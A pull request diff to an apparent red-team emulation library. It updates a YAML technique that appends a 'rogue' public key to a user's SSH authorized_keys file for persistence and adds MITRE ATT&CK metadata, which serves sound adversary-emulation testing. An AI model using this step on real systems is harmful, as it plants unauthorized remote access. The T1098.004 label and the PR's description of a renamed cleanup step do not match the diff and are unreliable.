### PR TITLE
Update `backdoor-ssh-authorized-keys` TTP with MITRE ATT&CK mapping and other QoL YAML enhancements

### DIFF
--- a/ttps/persistence/ssh/backdoor-ssh-authorized-keys/README.md
+++ b/ttps/persistence/ssh/backdoor-ssh-authorized-keys/README.md
@@ -42,3 +42,12 @@ ttpforge run forgearmory//persistence/ssh/backdoor-ssh-authorized-keys/backdoor-
    allows the rogue public SSH key to be used for maintaining persistence
    on the target system. Unless `--no-cleanup` is set, the original
    `authorized_keys` file is restored.
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0003 Persistence
+- **Techniques**:
+  - T1098: Account Manipulation
+- **Subtechniques**:
+  - T1098.004: Add or Modify System Process

--- a/ttps/persistence/ssh/backdoor-ssh-authorized-keys/backdoor-ssh-authorized-keys.yaml
+++ b/ttps/persistence/ssh/backdoor-ssh-authorized-keys/backdoor-ssh-authorized-keys.yaml
@@ -8,30 +8,24 @@ args:
     default: "${HOME}/.ssh/authorized_keys"
   - name: rogue_key
     description: "The rogue public SSH key to be added"
+    required: true
+requirements:
+  platforms:
+    - os: windows
+    - os: linux
+    - os: darwin
+mitre:
+  tactics:
+    - TA0003 Persistence
+  techniques:
+    - T1098 Account Manipulation
+  subtechniques:
+    - T1098.004 Add or Modify System Process
 
 steps:
-  - name: ensure-authorized_keys-present
-    inline: |
-      set -e
-
-      if [[ ! -f "{{ .Args.ssh_authorized_keys }}" ]]; then
-        echo "Error: no authorized_keys file present at the specified path."
-        exit 1
-      fi
-
-  - name: backup-authorized_keys
-    inline: |
-      set -e
-
-      cp "{{ .Args.ssh_authorized_keys }}" "{{ .Args.ssh_authorized_keys }}.bak"
-
   - name: modify-authorized_keys
-    inline: |
-      set -e
-
-      echo "{{ .Args.rogue_key }}" >> "{{ .Args.ssh_authorized_keys }}"
-    cleanup:
-      inline: |
-        set -e
-
-        mv "{{ .Args.ssh_authorized_keys }}.bak" "{{ .Args.ssh_authorized_keys }}"
+    edit_file: {{ .Args.ssh_authorized_keys }}
+    backup_file: "{{ .Args.ssh_authorized_keys }}.bak"
+    edits:
+      - description: "Add input {{ .Args.rogue_key }} to {{ .Args.ssh_authorized_keys }}"
+        append: "{{ .Args.rogue_key }}"


### PR DESCRIPTION
Summary:
**Added:**

- MITRE ATT&CK mapping - Added MITRE ATT&CK mapping to the `backdoor-ssh-authorized-keys` TTP, including tactics, techniques, and subtechniques for better alignment with security frameworks.

**Changed:**

- TTP YAML structure - Updated the `backdoor-ssh-authorized-keys` TTP YAML file to include `requirements` and `mitre` sections, and marked `rogue_key` as a required argument.
- Simplified step scripts - Streamlined the inline scripts for the `backup-authorized_keys` and `modify-authorized_keys` steps for clarity and efficiency.
- Cleanup step naming - Renamed the cleanup step in `modify-authorized_keys` to `restore-old-authorized-keys` for better readability.

Reviewed By: d0n601

Differential Revision: D54282053


